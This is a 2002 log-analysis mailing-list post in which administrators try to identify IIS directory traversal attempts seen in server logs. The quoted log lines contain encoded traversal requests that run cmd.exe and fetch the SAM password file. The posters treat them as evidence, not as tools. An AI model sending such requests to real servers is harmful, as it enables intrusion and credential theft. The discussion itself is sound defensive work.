On Tue, Jun 11, 2002 at 02:32:43PM -0700, Michael Katz wrote: > At 6/11/2002 01:03 PM, Tina Bird wrote: > >Here's what I'm seeing -- anyone have any information on this variant? > > > >Jun 10 12:53:37.845 <information deleted> op=GET arg=http://Target > >IP/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c: > >\\*.cif/s/b result="500 Server Error" > > > >Jun 10 12:53:39.675 <information deleted> op=GET arg=http://Target > >IP/a.asp/..%c1%1c../..%c1%1c../winnt/repair/sam result="404 Object Not > >Found" > > > >Jun 10 12:53:43.578 <information deleted> op=GET arg=http://Target > >IP/a.asp/..%c1%9c../..%c1%9c../winnt/repair/sam result="404 Object Not > >Found" > > This is definitely not Nimda, although it attempts to exploit the same > directory traversal vulnerability in IIS as Nimda > (http://www.microsoft.com/technet/security/bulletin/ms00-078.asp). In > fact, if these are the timestamps and there are no other logs, it appears > that this attack is being manually performed. Or that the tool in question inserts random intervals between connection attempts. I'm not saying that it's likely, just that it's possible. (Perhaps this should be thrown over to the incidents list? That seems more appropriate for exploit identification discussions. (Not that they are OT here, of course, but there are probably more eyes who are familiar with IDing new variants over there.)) -- Sweth. -- Sweth Chandramouli Idiopathic Systems Consulting svcat_private http://www.idiopathic.net/ --------------------------------------------------------------------- To unsubscribe, e-mail: loganalysis-unsubscribeat_private For additional commands, e-mail: loganalysis-helpat_private
This archive was generated by hypermail 2b30 : Tue Jun 11 2002 - 16:56:39 PDT